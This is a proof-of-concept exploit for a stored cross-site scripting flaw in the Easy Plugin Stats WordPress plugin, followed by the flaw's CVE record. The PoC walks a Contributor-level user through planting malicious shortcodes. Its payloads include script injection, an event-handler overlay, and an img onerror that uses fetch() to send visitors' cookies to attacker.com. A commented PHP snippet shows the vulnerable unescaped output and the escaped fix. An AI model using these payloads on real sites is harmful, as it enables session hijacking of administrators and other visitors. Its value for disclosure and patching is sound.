CVE-2025-7652

<!-- PoC for CVE-2025-7652 - Stored XSS via 'eps' shortcode in Easy Plugin Stats plugin Requirements: WordPress account with Contributor level or above access --> <!-- Step 1: As a Contributor, create a new post or page --> <!-- Step 2: Insert the following malicious shortcode in the content --> [eps title=""><script>alert('XSS-CVE-2025-7652-'+document.cookie)</script>" some_attr="test"] <!-- Alternative payload using event handlers --> [eps title="test" onmouseover="alert(document.domain)" style="position:fixed;top:0;left:0;width:100%;height:100%" ] <!-- Payload for cookie stealing (example - in real attack, replace with attacker's server) --> [eps title=""><img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">" ] <!-- Step 3: Publish or submit the post for review --> <!-- Step 4: When any user (especially admin) views the page, the script executes --> <?php // Example of the vulnerable code pattern in the plugin (simplified): // function eps_shortcode_handler($atts) { // $atts = shortcode_atts(array( // 'title' => '', // // ... other attributes // ), $atts); // // VULNERABLE: Direct output without escaping // return '<div class="eps-stats" title="' . $atts['title'] . '">' . $content . '</div>'; // } // add_shortcode('eps', 'eps_shortcode_handler'); // FIXED VERSION should use: // return '<div class="eps-stats" title="' . esc_attr($atts['title']) . '">' . wp_kses_post($content) . '</div>'; ?>

{"cve": {"id": "CVE-2025-7652", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:43.823", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Plugin Stats plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eps' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/easy-plugin-stats/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/290a790f-7d11-4be7-9146-cb07919b1e60?source=cve", "source": "[email protected]"}]}}